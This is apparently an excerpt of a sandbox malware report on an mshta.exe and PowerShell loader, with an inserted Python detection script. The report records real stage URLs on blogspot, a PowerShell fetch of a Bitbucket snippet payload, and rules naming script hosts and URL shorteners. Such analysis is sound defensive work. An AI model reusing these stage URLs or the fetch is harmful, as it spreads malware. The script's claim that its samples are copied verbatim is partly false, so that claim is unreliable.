Source: global traffic HTTP traffic detected: GET /blogin.g?blogspotURL=https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%2522&type=blog HTTP/1.1Accept: */*Referer: https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.blogger.comConnection: Keep-AliveCookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236
Source: global traffic HTTP traffic detected: GET /ServiceLogin?continue=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://ghostbackbone123.blogspot.com/p/ghostbackup15.html%252522%26type%3Dblog%26bpli%3D1&followup=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://ghostbackbone123.blogspot.com/p/ghostbackup15.html%252522%26type%3Dblog%26bpli%3D1&passive=true&go=true HTTP/1.1Accept: */*Referer: https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: accounts.google.comCookie: __Host-GAPS=1:L3viVeTwYcxGvOqhkZuspYUloSz1Cg:OYEqVJkk_9TWQB1Z
Source: global traffic HTTP traffic detected: GET /blogin.g?blogspotURL=https%3A%2F%2Fghostbackbone123.blogspot.com%2Fp%2Fghostbackup15.html%2522&type=blog&bpli=1 HTTP/1.1Accept: */*Referer: https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: www.blogger.comCookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236
Source: global traffic HTTP traffic detected: GET /!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: bitbucket.org
Source: global traffic HTTP traffic detected: GET /css/maia.css HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fghostbackbone123.blogspot.com%2Fp%2Fghostbackup15.html%2522&type=blog&bpli=1Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.google.comIf-Modified-Since: Mon, 25 May 2020 08:30:00 GMTConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /analytics.js HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fghostbackbone123.blogspot.com%2Fp%2Fghostbackup15.html%2522&type=blog&bpli=1Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.google-analytics.comIf-Modified-Since: Wed, 11 Aug 2021 00:32:57 GMTConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /css/maia.css HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fbackbones1234511a.blogspot.com%2Fp%2Fayoolaback.html%2522&type=blog&bpli=1Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.google.comIf-Modified-Since: Mon, 25 May 2020 08:30:00 GMTConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /analytics.js HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fbackbones1234511a.blogspot.com%2Fp%2Fayoolaback.html%2522&type=blog&bpli=1Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.google-analytics.comIf-Modified-Since: Wed, 11 Aug 2021 00:32:57 GMTConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /p/ayoola.html HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: randikhanaekminar.blogspot.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /p/ayoolaback.html%22 HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: backbones1234511a.blogspot.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /p/ghostbackup15.html%22 HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ghostbackbone123.blogspot.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /p/ayoolaback.html%22 HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: backbones1234511a.blogspot.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /p/ghostbackup15.html%22 HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ghostbackbone123.blogspot.comConnection: Keep-Alive
Connects to a URL shortener service
Source: C:\Windows\SysWOW64\mshta.exe DNS query: name: bitly.com
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundX-Robots-Tag: noindex, nofollowContent-Type: text/html; charset=UTF-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Wed, 15 Sep 2021 13:50:58 GMTX-Content-Type-Options: nosniffX-XSS-Protection: 1; mode=blockServer: GSEAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
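The request lines above are printed by the sandbox with their CRLFs stripped, so each start line and its headers run together on one line. The loader's tell-tales are still readable in them: the blogspot page fetches whose path ends in a stray encoded double quote (`%22`, a quote character leaked from the script's string concatenation), the IE7 compatibility User-Agent (`Mozilla/4.0 (compatible; MSIE 7.0; ... Trident/7.0 ...)`) that a hosted MSHTML engine such as mshta.exe sends by default on those fetches, and PowerShell's own User-Agent (`WindowsPowerShell/5.1.17134.1`) pulling a raw Bitbucket snippet file. The following Python is an added example, not part of the Joe Sandbox report: it splits such run-together lines back into structured requests on the header names the report uses, runs those three observations as detection rules, and turns the "Connects to a URL shortener service" signature (mshta.exe resolving bitly.com) into a rule as well. The rule names, the `HEADER_NAMES` list, and the `SHORTENERS` and `SCRIPT_HOSTS` sets are assumptions made for the example; the four sample request lines are copied verbatim from the report above.

```python
import re
from dataclasses import dataclass
from urllib.parse import urlsplit

# The sandbox prints each request with its CRLFs stripped, so the start line and the
# headers run together ("GET /x HTTP/1.1Accept: */*Referer: ..."). The only reliable
# seam is a header name followed by ": ", so we split on the names this report uses.
HEADER_NAMES = ("Accept", "Accept-Language", "Accept-Encoding", "Referer", "UA-CPU",
                "User-Agent", "Host", "If-Modified-Since", "Connection", "Cookie")
_SEAM = re.compile(r"(?=(?:%s): )" % "|".join(re.escape(n) for n in HEADER_NAMES))
_START = re.compile(r"^(?P<method>[A-Z]+) (?P<target>\S+) HTTP/1\.[01]$")
_PREFIX = "Source: global traffic HTTP traffic detected: "

# Assumed lists for this example: shortener domains worth flagging, and Windows
# script hosts that have no legitimate reason to resolve them on their own.
SHORTENERS = {"bitly.com", "bit.ly", "tinyurl.com", "cutt.ly", "rb.gy", "t.co"}
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe"}


@dataclass
class Request:
    method: str
    target: str      # path plus query string, exactly as sent
    headers: dict

    @property
    def host(self) -> str:
        return self.headers.get("Host", "").lower()

    @property
    def path(self) -> str:
        return urlsplit(self.target).path


def parse_report_request(line: str) -> Request:
    """Turn one run-together 'HTTP traffic detected' line into a Request."""
    line = line.strip()
    if line.startswith(_PREFIX):
        line = line[len(_PREFIX):]
    parts = _SEAM.split(line)          # parts[0] is the start line, the rest are headers
    m = _START.match(parts[0])
    if not m:
        raise ValueError("no HTTP start line in %r" % parts[0][:60])
    headers = dict(part.split(": ", 1) for part in parts[1:])
    return Request(m["method"], m["target"], headers)


def findings(req: Request) -> list:
    """Rule names (chosen for this example) that fire on one request."""
    hits = []
    ua = req.headers.get("User-Agent", "")
    # PowerShell's default web client User-Agent pulling a raw Bitbucket snippet file.
    if ("WindowsPowerShell/" in ua and req.host == "bitbucket.org"
            and req.path.startswith("/!api/2.0/snippets/")):
        hits.append("powershell_fetches_bitbucket_snippet")
    # An encoded double quote glued to the end of the path: the loader's string
    # concatenation leaked a quote character into the URL it requests.
    if req.path.endswith("%22"):
        hits.append("stray_quote_in_path")
    # The IE7 compatibility User-Agent that a hosted MSHTML engine (mshta.exe here)
    # sends by default, fetching a blogspot page used as a payload drop.
    if req.host.endswith(".blogspot.com") and ua.startswith("Mozilla/4.0 (compatible; MSIE 7.0"):
        hits.append("legacy_ie_ua_to_blogspot")
    return hits


def shortener_query(process: str, name: str) -> bool:
    """The report's 'Connects to a URL shortener service' signature as a rule:
    a script host resolving a shortener domain (mshta.exe -> bitly.com above)."""
    return process.lower() in SCRIPT_HOSTS and name.lower() in SHORTENERS


def payload_stages(lines) -> list:
    """Unique (host, path) pairs of every request that fires a rule, in first-seen
    order: the loader's stage URLs without Google's own redirect and analytics noise."""
    seen, stages = set(), []
    for line in lines:
        req = parse_report_request(line)
        if findings(req) and (req.host, req.path) not in seen:
            seen.add((req.host, req.path))
            stages.append((req.host, req.path))
    return stages


# Four request lines copied verbatim from the report above; the blogin.g one is part
# of Blogger's own login redirect chain and is expected to stay quiet.
SAMPLE_LINES = [
    "Source: global traffic HTTP traffic detected: GET /p/backbone16.html%22 HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: startthepartyup.blogspot.comConnection: Keep-Alive",
    "Source: global traffic HTTP traffic detected: GET /!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: bitbucket.orgConnection: Keep-Alive",
    "Source: global traffic HTTP traffic detected: GET /p/ayoola.html HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: randikhanaekminar.blogspot.comConnection: Keep-Alive",
    "Source: global traffic HTTP traffic detected: GET /blogin.g?blogspotURL=https://startthepartyup.blogspot.com/p/backbone16.html%2522&type=blog HTTP/1.1Accept: */*Referer: https://startthepartyup.blogspot.com/p/backbone16.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.blogger.comConnection: Keep-AliveCookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236",
]

if __name__ == "__main__":
    for line in SAMPLE_LINES:
        req = parse_report_request(line)
        print(req.host, req.path, findings(req))
    print("stages:", payload_stages(SAMPLE_LINES))
    print("shortener lookup from mshta.exe:", shortener_query("mshta.exe", "bitly.com"))
```

Splitting on header names is only safe because none of the report's header values contain a header name followed by `": "`; a URL or cookie value that did would be cut in two, which is why the parser is keyed to the `HEADER_NAMES` seen in this report rather than to any `Word: ` pattern. The rules are deliberately tied to what this sample did (stray `%22`, IE7 compatibility UA on blogspot, PowerShell UA on a Bitbucket snippet) so that Blogger's own `blogin.g` and `analytics.js` requests, which appear in the same capture, do not fire.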
Source: mshta.exe, 0000001B.00000002.538001966.0000020DA13BB000.00000004.00000020.sdmp, mshta.exe, 0000001B.00000002.537840121.0000020DA13B5000.00000004.00000020.sdmp, mshta.exe, 0000001B.00000002.574984835.00000215A60C3000.00000004.00000001.sdmp String found in binary or memory: http://backbones1234511a.blogspot.com/p/ayoolaback.html%22
Source: mshta.exe, 00000026.00000002.537540632.0000025B28400000.00000004.00000020.sdmp String found in binary or memory: http://backbones1234511a.blogspot.com/p/ayoolaback.html%22Lo
Source: mshta.exe, 0000001B.00000002.538001966.0000020DA13BB000.00000004.00000020.sdmp String found in binary or memory: http://backbones1234511a.blogspot.com/p/ayoolaback.html%22l
Source: mshta.exe, 0000001B.00000002.538001966.0000020DA13BB000.00000004.00000020.sdmp String found in binary or memory: http://backbones1234511a.blogspot.com/p/ayoolaback.html%22n8
Source: mshta.exe, 0000001B.00000002.536149050.0000020DA1380000.00000004.00000020.sdmp String found in binary or memory: http://backbones1234511a.blogspot.com/p/ayoolaback.html%22w8
Source: mshta.exe, 00000006.00000003.269888355.0000000002E93000.00000004.00000001.sdmp, powershell.exe, 00000009.00000002.488833964.00000000036BB000.00000004.00000001.sdmp, powershell.exe, 00000016.00000002.517008980.000001ACCCB1F000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.559199361.00000215A3DF0000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.558814631.000001BEE8A42000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.537342288.00000214EFFEC000.00000004.00000020.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000009.00000003.363343843.00000000083F1000.00000004.00000001.sdmp String found in binary or memory: http://crl.microsof8
Source: mshta.exe, 00000006.00000002.431863271.000000000A361000.00000004.00000001.sdmp String found in binary or memory: http://crl.pki.goog/GTS1O1core.crl0
Source: mshta.exe, 00000006.00000002.431863271.000000000A361000.00000004.00000001.sdmp String found in binary or memory: http://crl.pki.goog/gsr2/gsr2.crl0?
Source: mshta.exe, 00000006.00000003.308074680.000000000E06B000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.271983439.00000000067D5000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.386990795.000001BEEAE20000.00000004.00000001.sdmp String found in binary or memory: http://csi.gstatic.com/csi
Source: mshta.exe, 00000021.00000002.536031490.00000214EFFB6000.00000004.00000020.sdmp, mshta.exe, 00000021.00000002.536287694.00000214EFFBD000.00000004.00000020.sdmp String found in binary or memory: http://ghostbackbone123.blogspot.com/p/ghostbackup15.html%22
Source: mshta.exe, 00000021.00000002.534478877.00000214EFF94000.00000004.00000020.sdmp String found in binary or memory: http://ghostbackbone123.blogspot.com/p/ghostbackup15.html%226
Source: mshta.exe, 00000021.00000002.537342288.00000214EFFEC000.00000004.00000020.sdmp String found in binary or memory: http://ghostbackbone123.blogspot.com/p/ghostbackup15.html%22Q
Source: mshta.exe, 00000021.00000002.537342288.00000214EFFEC000.00000004.00000020.sdmp String found in binary or memory: http://ghostbackbone123.blogspot.com/p/ghostbackup15.html%22Y
Source: mshta.exe, 00000021.00000002.537342288.00000214EFFEC000.00000004.00000020.sdmp String found in binary or memory: http://ghostbackbone123.blogspot.com/p/ghostbackup15.html%22y.IE5
Source: powershell.exe, 00000016.00000002.501338315.000001ACC4A86000.00000004.00000001.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: mshta.exe, 00000006.00000002.431863271.000000000A361000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.pki.goog/gsr202
Source: mshta.exe, 00000006.00000002.431863271.000000000A361000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.pki.goog/gts1o1core0
Source: powershell.exe, 00000016.00000002.423706608.000001ACB4C30000.00000004.00000001.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000009.00000002.491682345.0000000005521000.00000004.00000001.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png8
Source: mshta.exe, 00000006.00000002.431863271.000000000A361000.00000004.00000001.sdmp String found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0
Source: mshta.exe, 00000006.00000003.389899545.0000000006774000.00000004.00000001.sdmp String found in binary or memory: http://schema.org/BlogPosting
Source: powershell.exe, 00000009.00000002.491172132.00000000053E1000.00000004.00000001.sdmp, powershell.exe, 00000016.00000002.418649921.000001ACB4A21000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: mshta.exe, 0000001D.00000003.387444480.000001BEEAE96000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.385678317.000001BEED482000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.387672537.000001BEEAD37000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.386990795.000001BEEAE20000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.583919483.000001BEEB0BA000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.599626141.0000021CF6CB6000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.584891429.0000021CF4A17000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.573809584.0000021CF4684000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.622770699.0000021CF7452000.00000004.00000001.sdmp, mshta.exe, 00000026.00000002.593616053.000002632F192000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000016.00000002.423706608.000001ACB4C30000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000009.00000002.491682345.0000000005521000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html8
Source: mshta.exe, 00000006.00000003.307694969.000000000686C000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0Ju
Source: mshta.exe, 00000006.00000002.431863271.000000000A361000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.382069371.000000000A410000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.314690135.000000000A33F000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.309308738.000000000A35F000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.562081398.00000215A3EC2000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.574511521.00000215A608E000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.541490035.000001B6E5EFA000.00000004.00000020.sdmp, mshta.exe, 0000001D.00000002.559507739.000001BEE8AEB000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.556709892.0000021CF233E000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.554636207.0000021CF22A7000.00000004.00000001.sdmp String found in binary or memory: http://www.blogger.com/go/cookiechoices
Source: mshta.exe, 00000006.00000002.432469897.000000000A38A000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.574984835.00000215A60C3000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.387672537.000001BEEAD37000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.573809584.0000021CF4684000.00000004.00000001.sdmp String found in binary or memory: http://www.cookiechoices.org/
Source: mshta.exe, 00000021.00000002.618824886.0000021CF72F0000.00000004.00000040.sdmp String found in binary or memory: http://www.macromedia.com
Source: mshta.exe, 0000001B.00000002.574511521.00000215A608E000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.389884952.000001BEEAD0D000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.571480214.0000021CF4610000.00000004.00000001.sdmp String found in binary or memory: https://accounts.google.com/
Source: mshta.exe, 00000021.00000002.571480214.0000021CF4610000.00000004.00000001.sdmp String found in binary or memory: https://accounts.google.com/#
Source: mshta.exe, 0000001B.00000002.574511521.00000215A608E000.00000004.00000001.sdmp String found in binary or memory: https://accounts.google.com/A
Source: mshta.exe, 00000006.00000003.389899545.0000000006774000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.562081398.00000215A3EC2000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.551594539.00000215A320F000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.574984835.00000215A60C3000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.559632238.000001BEE8B06000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.387672537.000001BEEAD37000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.352421705.000001BEEAD2C000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.550016684.000001BEE7D1B000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.559451367.000001BEE8ADF000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.549327111.00000214F1AEF000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.557329794.0000021CF236A000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.571480214.0000021CF4610000.00000004.00000001.sdmp, mshta.exe, 00000026.00000002.551825360.000002632A3EC000.00000004.00000001.sdmp String found in binary or memory: https://accounts.google.com/ServiceLogin?continue=https://www.blogger.com/blogin.g?blogspotURL%3Dhtt
Source: mshta.exe, 00000021.00000002.574848844.0000021CF46F2000.00000004.00000001.sdmp String found in binary or memory: https://accounts.google.com/ServiceLogin?service=blogger&continue=https://www.blogger.com/blogge
Source: mshta.exe, 0000001D.00000003.389378675.000001BEEAD09000.00000004.00000001.sdmp String found in binary or memory: https://accounts.google.com/ServiceLogin?service=blogger&continue=https://www.blogger.com/blogger.g&
Source: mshta.exe, 0000001B.00000002.574511521.00000215A608E000.00000004.00000001.sdmp String found in binary or memory: https://accounts.google.com/U
Source: mshta.exe, 00000006.00000002.426000725.0000000006700000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.389017798.000001BEEADFE000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.385776898.000001BEED3A1000.00000004.00000001.sdmp String found in binary or memory: https://ads.google.com/home/?subid=ww-ww-et-g-aw-a-vasquette_ads_cons_1
Source: mshta.exe, 00000006.00000003.382069371.000000000A410000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.279117021.00000000068CA000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.313544011.0000000008DE7000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000003.342606114.00000215A3D73000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.601581052.00000215A8B9B000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.623318608.00000215A961D000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.582770017.000001BEEB058000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.386990795.000001BEEAE20000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.360185512.000001BEE8977000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.610943907.0000021CF709E000.00000004.00000001.sdmp, mshta.exe, 00000021.00000003.390770011.0000021CF2488000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.598269761.0000021CF6C4D000.00000004.00000001.sdmp String found in binary or memory: https://ampcid.google.com/v1/publisher:getClientId
Source: mshta.exe, 00000006.00000003.332704739.000000000DFD9000.00000004.00000001.sdmp String found in binary or memory: https://apis.googl
Source: mshta.exe, 00000006.00000003.284167006.000000000E037000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.315918707.000000000DF11000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.400562039.00000000067A4000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.402196536.000000000A2FA000.00000004.00000001.sdmp, mshta.exe, 0000000D.00000003.462832097.00000290ABE2B000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.576518142.00000215A616B000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.385678317.000001BEED482000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.573256646.000001BEEAD2D000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.609912843.000001BEED35E000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.604188808.000001BEED297000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.383485693.000001BEEDE14000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.383394302.000001BEEDDFE000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.574848844.0000021CF46F2000.00000004.00000001.sdmp String found in binary or memory: https://apis.google.com
Source: mshta.exe, 00000021.00000002.571480214.0000021CF4610000.00000004.00000001.sdmp String found in binary or memory: https://apis.google.com/js/plusone.js
Source: mshta.exe, 00000006.00000003.284394415.000000000A384000.00000004.00000001.sdmp String found in binary or memory: https://artsandculture.google.com/?hl=en-GB&utm_source=ogs.google.com&utm_medium=referral
Source: mshta.exe, 0000001D.00000003.385776898.000001BEED3A1000.00000004.00000001.sdmp String found in binary or memory: https://artsandculture.google.com/?hl=en-GB&utm_source=ogs.google.com&utm_medium=referraleferral
Source: mshta.exe, 0000001D.00000003.387672537.000001BEEAD37000.00000004.00000001.sdmp String found in binary or memory: https://artsandculture.google.com/?hl=en-GB&utm_source=ogs.google.com&utm_medium=referralis
Source: powershell.exe, 00000016.00000002.427496581.000001ACB4DC6000.00000004.00000001.sdmp, powershell.exe, 00000016.00000002.505010455.000001ACC4FE9000.00000004.00000001.sdmp String found in binary or memory: https://aui-cdn.atlassian.com
Source: mshta.exe, 0000001B.00000002.574984835.00000215A60C3000.00000004.00000001.sdmp String found in binary or memory: https://backbones1234511a.blogspot.com/
Source: mshta.exe, 0000001B.00000002.574984835.00000215A60C3000.00000004.00000001.sdmp String found in binary or memory: https://backbones1234511a.blogspot.com//p/ayoolaback.html%22
Source: mshta.exe, 0000001B.00000002.559609483.00000215A3E29000.00000004.00000001.sdmp String found in binary or memory: https://backbones1234511a.blogspot.com//p/ayoolaback.html%2244))
Source: mshta.exe, 0000001B.00000002.574275130.00000215A6070000.00000004.00000001.sdmp String found in binary or memory: https://backbones1234511a.blogspot.com//p/ayoolaback.html%22x
Source: mshta.exe, 00000026.00000002.582535997.000002632CF37000.00000004.00000001.sdmp String found in binary or memory: https://backbones1234511a.blogspot.com/O
Source: mshta.exe, 0000001B.00000002.562081398.00000215A3EC2000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.574511521.00000215A608E000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.560048090.00000215A3E56000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.559609483.00000215A3E29000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.574984835.00000215A60C3000.00000004.00000001.sdmp String found in binary or memory: https://backbones1234511a.blogspot.com/favicon.ico
